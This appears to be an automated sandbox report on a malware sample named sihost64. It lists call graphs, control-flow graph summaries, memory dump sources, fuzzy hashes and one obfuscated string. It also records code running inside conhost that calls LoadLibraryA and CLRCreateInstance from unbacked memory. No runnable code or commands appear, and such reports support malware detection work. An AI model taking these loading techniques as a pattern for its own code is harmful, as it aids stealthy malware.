                                                                  callgraph 0 Function_004090C0 1 Function_00401443 2 Function_004010C4 14 Function_004019D8 2->14 15 Function_00401D58 2->15 34 Function_00401000 2->34 46 Function_00401D18 2->46 47 Function_00401C98 2->47 59 Function_00401D98 2->59 3 Function_004017C6 4 Function_004024C7 5 Function_004022CB 6 Function_0040224F 6->2 18 Function_00402158 6->18 25 Function_004021EC 6->25 7 Function_00401BD8 27 Function_004018EF 7->27 8 Function_00401F58 8->27 9 Function_00401DD8 9->27 10 Function_00401C58 10->27 11 Function_00401B58 11->27 12 Function_00401AD8 12->27 13 Function_00401A58 13->27 14->27 15->27 16 Function_00401CD8 16->27 17 Function_00402058 17->27 19 Function_004020D8 19->27 20 Function_00401FD8 20->27 21 Function_00401E58 21->27 22 Function_00401ED8 22->27 23 Function_00409CDA 24 Function_004021E5 26 Function_0040946D 64 Function_004014B4 27->64 28 Function_00401970 29 Function_004023F2 29->2 30 Function_00409E76 31 Function_00402477 32 Function_00409678 33 Function_004022FA 33->6 35 Function_00409004 36 Function_00401784 37 Function_00409384 38 Function_00409686 39 Function_00402487 40 Function_00409989 41 Function_00409D8A 42 Function_00409290 43 Function_00402497 44 Function_00401E98 44->27 45 Function_00401F98 45->27 46->27 47->27 48 Function_00401B18 48->27 49 Function_00401A18 49->27 50 Function_00401998 50->27 51 Function_00401A98 51->27 52 Function_00401B98 52->27 53 Function_00401C18 53->27 54 Function_00402118 54->27 55 Function_00401F18 55->27 56 Function_00402098 56->27 57 Function_00402018 57->27 58 Function_00401E18 58->27 59->27 60 Function_00409D9A 61 Function_00409D22 62 Function_004024A7 63 Function_004094AC 64->1 64->28 65 Function_004024B7 66 Function_004096B7 67 Function_004092B8 68 Function_004010BD

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1784760757.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 0000000A.00000002.1784645333.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000A.00000002.1784864968.0000000000403000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000A.00000002.1784889647.0000000000409000.00000004.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_400000_sihost64.jbxd
                                                                  Similarity
                                                                  • API ID: memsetsprintf
                                                                  • String ID: /sihost64
                                                                  • API String ID: 4041149307-4205773068
                                                                  • Opcode ID: 340b51d94c547dc9600aa4fc2f31ce9ed4fc2ceb995e8576dbd42bee5433ba49
                                                                  • Instruction ID: aca2fdf8534d1f55052996b791b38ba642986683fcb313dcb59f68fb06fbf62c
                                                                  • Opcode Fuzzy Hash: 340b51d94c547dc9600aa4fc2f31ce9ed4fc2ceb995e8576dbd42bee5433ba49
                                                                  • Instruction Fuzzy Hash: 55712A61702B148DEB909B27DC5139A37A8B749FC8F804176EE4CA7B98EE3CCA44C744

                                                                  Control-flow Graph

                                                                  control_flow_graph 33 401000-401045 call 402478 36 401048-401050 33->36 37 4010b6-4010bb 36->37 38 401056-4010b4 36->38 38->36
                                                                  Strings
                                                                  • 97casc*52>ps6cz+rgg<=c,g=>+d:.z+, xrefs: 00401098
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1784760757.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 0000000A.00000002.1784645333.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000A.00000002.1784864968.0000000000403000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000A.00000002.1784889647.0000000000409000.00000004.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_400000_sihost64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 97casc*52>ps6cz+rgg<=c,g=>+d:.z+
                                                                  • API String ID: 0-363803121
                                                                  • Opcode ID: 7c3953f8a7c90db685ffea7de54f2d06ba9ad392580460fe7ac0a4260f709850
                                                                  • Instruction ID: 0d50406a0cd25772023a57935085f3dfc6f67c384a3cfb9a17e074b16623a215
                                                                  • Opcode Fuzzy Hash: 7c3953f8a7c90db685ffea7de54f2d06ba9ad392580460fe7ac0a4260f709850
                                                                  • Instruction Fuzzy Hash: BC214772B01A40DEEB04CBA9D8913AC3BF1E74878DF00846AEE5DA7B58DA38D5518744

                                                                  Control-flow Graph

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1784760757.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 0000000A.00000002.1784645333.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000A.00000002.1784864968.0000000000403000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000A.00000002.1784889647.0000000000409000.00000004.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_400000_sihost64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4a0ac8e6eccd96365346d7e5f4705697b6c7359cb9289b894d2f67c7d5b7cf9d
                                                                  • Instruction ID: 712002830166568aab168b156390cc9c0f9dd4445f1c5f10fc4b9559ecfc971b
                                                                  • Opcode Fuzzy Hash: 4a0ac8e6eccd96365346d7e5f4705697b6c7359cb9289b894d2f67c7d5b7cf9d
                                                                  • Instruction Fuzzy Hash: 83211CA4301A1488EA80DB57DE5539933A4BB49FC8F40453A9F4CB73E5EEBCC9018358

                                                                  Control-flow Graph

                                                                  control_flow_graph 56 40224f-4022ca call 402158 call 4010c4 call 4021ec
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1784760757.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 0000000A.00000002.1784645333.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000A.00000002.1784864968.0000000000403000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000A.00000002.1784889647.0000000000409000.00000004.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_400000_sihost64.jbxd
                                                                  Similarity
                                                                  • API ID: memsetsprintf
                                                                  • String ID:
                                                                  • API String ID: 4041149307-0
                                                                  • Opcode ID: 4a964056c5c93370836b2055aa88bb79ebf9a1f25246f745588850a4ea836d32
                                                                  • Instruction ID: b0320e2237b37ba28e1691a43af3f9c87918e2f692b894f33fb3e2e628c141ca
                                                                  • Opcode Fuzzy Hash: 4a964056c5c93370836b2055aa88bb79ebf9a1f25246f745588850a4ea836d32
                                                                  • Instruction Fuzzy Hash: 1B01E4B6701B488DDB40DF66DD8138833A4B708BC8F00492AAF4CA7BA9DA78C6118748

                                                                  Execution Graph

                                                                  Execution Coverage:13.8%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:19
                                                                  Total number of Limit Nodes:2
                                                                  execution_graph 1914 299653036af LoadLibraryA 1915 299653036c7 1914->1915 1916 29965304506 1917 29965304528 1916->1917 1918 29965304654 LoadLibraryA 1917->1918 1919 29965304669 1917->1919 1926 2996530457c 1917->1926 1918->1917 1919->1926 1927 2996530471d 1919->1927 1933 299653036a2 1919->1933 1921 299653046f3 1922 299653046f7 1921->1922 1928 299653037ba LoadLibraryA 1921->1928 1922->1921 1922->1926 1925 2996530470c 1925->1926 1925->1927 1927->1926 1930 299653042b2 1927->1930 1929 299653037df 1928->1929 1929->1925 1931 299653042f2 CLRCreateInstance 1930->1931 1932 2996530430b 1930->1932 1931->1932 1932->1926 1934 299653036af LoadLibraryA 1933->1934 1935 299653036c7 1934->1935 1935->1921

                                                                  Callgraph

                                                                  • Executed
                                                                  • Not Executed
                                                                  • Opacity -> Relevance
                                                                  • Disassembly available
                                                                  callgraph (rendered graph omitted; node-edge list not reproduced): function nodes numbered 0 to 124, spanning the 0000029965300000 and 00007FFD9BAA0000 memory regions

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph (rendered graph omitted; node-edge list not reproduced): function 29965304506; block 29965304654-29965304667 calls LoadLibraryA
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.2901128329.0000029965300000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029965300000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_29965300000_conhost.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: e85963f26a05e09d368196b1c7f413e753b92ff7721d7fdd34470331445b4a6a
                                                                  • Instruction ID: bc41dddcdaf23efc60157b6934667904614708d6932eea93ef278d77e867f980
                                                                  • Opcode Fuzzy Hash: e85963f26a05e09d368196b1c7f413e753b92ff7721d7fdd34470331445b4a6a
                                                                  • Instruction Fuzzy Hash: 31C1DA30310B09CBEB59EA2CC499FBD73D9FB94760F14056DD58AC7186DB21D982CB92

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph (rendered graph omitted; node-edge list not reproduced): function 7ffd9baa41a6; block 7ffd9baa45e3-7ffd9baa4648 calls 7ffd9baa4664; no API calls in the graph
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.2907348136.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_7ffd9baa0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f30a17c2407a20583cdb76a1d7c48807895cbd63725f76e67cc53b95d9eb1d1c
                                                                  • Instruction ID: 9e3eb298b37edd2c30deae64088a7a673842614395110b00422078090fcec09a
                                                                  • Opcode Fuzzy Hash: f30a17c2407a20583cdb76a1d7c48807895cbd63725f76e67cc53b95d9eb1d1c
                                                                  • Instruction Fuzzy Hash: 7EF1D830609A4E8FEBA8EF28C8657E977D1FF55310F04426EE84DC72A5CF74A9458B81

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph (rendered graph omitted; node-edge list not reproduced): function 7ffd9baa4f52; block 7ffd9baa5362-7ffd9baa53c4 calls 7ffd9baa53e0; no API calls in the graph
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.2907348136.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_7ffd9baa0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 684f1edd6f49e56c7de76862b6686b6b7f3387234d284d639ef9de3da0e4648b
                                                                  • Instruction ID: 50938c7a44e04375ff0f259356c0f06c908b23308a3d0b17ddd197897beadc6c
                                                                  • Opcode Fuzzy Hash: 684f1edd6f49e56c7de76862b6686b6b7f3387234d284d639ef9de3da0e4648b
                                                                  • Instruction Fuzzy Hash: 6DE1B330A09A4E8FEBA8EF28C8657F977D1FF54310F15426EE84DC7295CE74A9448B81

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph (rendered graph omitted; node-edge list not reproduced): function 299653042b2; block 299653042f2-29965304305 calls CLRCreateInstance
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.2901128329.0000029965300000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029965300000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_29965300000_conhost.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateInstance
                                                                  • String ID:
                                                                  • API String ID: 542301482-0
                                                                  • Opcode ID: e3a29ec6c90617ad7c1928cbae39db72877cdd96e7781ee4f5e73e7a13d7ce10
                                                                  • Instruction ID: 39c2e05ad7ee9b885a23f48ced91d8bf81656abf957d1ca36ab918e3a6ec924f
                                                                  • Opcode Fuzzy Hash: e3a29ec6c90617ad7c1928cbae39db72877cdd96e7781ee4f5e73e7a13d7ce10
                                                                  • Instruction Fuzzy Hash: AF817231208F088FD768EF28C888BAAB7E5FFA5351F004A6DD59BC7151EA31E645CB51

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph (rendered graph omitted; node-edge list not reproduced): function 299653037ba; entry block 299653037ba-299653037dd calls LoadLibraryA
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.2901128329.0000029965300000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029965300000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_29965300000_conhost.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                                                  • Instruction ID: ef830c8203f151aed60703a722155ab83223dfa166f9a7bef51b0ef1dec9add3
                                                                  • Opcode Fuzzy Hash: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                                                  • Instruction Fuzzy Hash: 4531A53130CA098FEB49AA6CA849AAA73D9E794760F00115DED4BC3286DD74ED4687D2

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph (rendered graph omitted; node-edge list not reproduced): function 299653036af; entry block 299653036af-299653036c5 calls LoadLibraryA
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.2901128329.0000029965300000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029965300000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_29965300000_conhost.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: f58acd79c9a8aa4a66f57679936c769f9dd2a38ea99c88ea39cd659f90fbd764
                                                                  • Instruction ID: 5bfd0fbcdfcb49f1ea94ce5920c3ae7bdd1402f1c59e3c28ce6f80e7639a49b7
                                                                  • Opcode Fuzzy Hash: f58acd79c9a8aa4a66f57679936c769f9dd2a38ea99c88ea39cd659f90fbd764
                                                                  • Instruction Fuzzy Hash: 8431A13130CE088BDB54AA5C9889B6A73DAE7D8B60F04025DDD0BC72C9DD61DD818792

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph (rendered graph omitted; node-edge list not reproduced): function 299653036a2; entry block 299653036a2-299653036c5 calls LoadLibraryA
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.2901128329.0000029965300000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029965300000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_29965300000_conhost.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                                                                  • Instruction ID: c38ad8eda7f3f4d29248dc1c2afadf0f729ef8267f1998ccb39e02e5f12c392b
                                                                  • Opcode Fuzzy Hash: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                                                                  • Instruction Fuzzy Hash: 92E0D83160CB0D5FF758969DD88ABB666DCD7962B1F00002EE649C2201E045D89143A2

                                                                  Control-flow Graph

                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.2907348136.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_7ffd9baa0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 902744b0e0739c435f523da74de0e8251aa74bea1bc7b77c55c171f80247c927
                                                                  • Instruction ID: 62c461bf09c75db776fb7c982fd4a321d525bd98dd1df2412d758731334bdc54
                                                                  • Opcode Fuzzy Hash: 902744b0e0739c435f523da74de0e8251aa74bea1bc7b77c55c171f80247c927
                                                                  • Instruction Fuzzy Hash: 2771F871B0DA484FEB58FBBC946A6B977D2EF99714F04017DE48EC3293CE64A8028745

                                                                  Control-flow Graph

                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.2907348136.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_7ffd9baa0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dd52b716409190460ea62701b42b3bf935ae272781b8159ed87b618c5ba5456d
                                                                  • Instruction ID: ef0d57a3499b7d42dc753bc986c337ee6fc910af00c139f801717fc8382b9690
                                                                  • Opcode Fuzzy Hash: dd52b716409190460ea62701b42b3bf935ae272781b8159ed87b618c5ba5456d
                                                                  • Instruction Fuzzy Hash: 34612B71B0DA484FEB54EBBC986A6B977D1EF99710F05017EE48EC3293CE64AC028745

                                                                  Control-flow Graph

                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.2907348136.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_7ffd9baa0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 27ce2445e480c514046062380682bd0dd6a8af42b2a1ffd4395458740d67f0cd
                                                                  • Instruction ID: e9ef50d1a6d360a64311c96e27ba81146f073afb41aedd2f7fcc0074392cd299
                                                                  • Opcode Fuzzy Hash: 27ce2445e480c514046062380682bd0dd6a8af42b2a1ffd4395458740d67f0cd
                                                                  • Instruction Fuzzy Hash: C2614930B0A6494FE775AFB884756B97BD2EF4A300F0100BAD48DC72E2CE686906C355

                                                                  Control-flow Graph

                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.2907348136.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_7ffd9baa0000_conhost.jbxd

Control-flow Graph

[Control-flow graph image not captured; the rendered graph covered basic blocks 7ffd9baa040d through 7ffd9baa04de]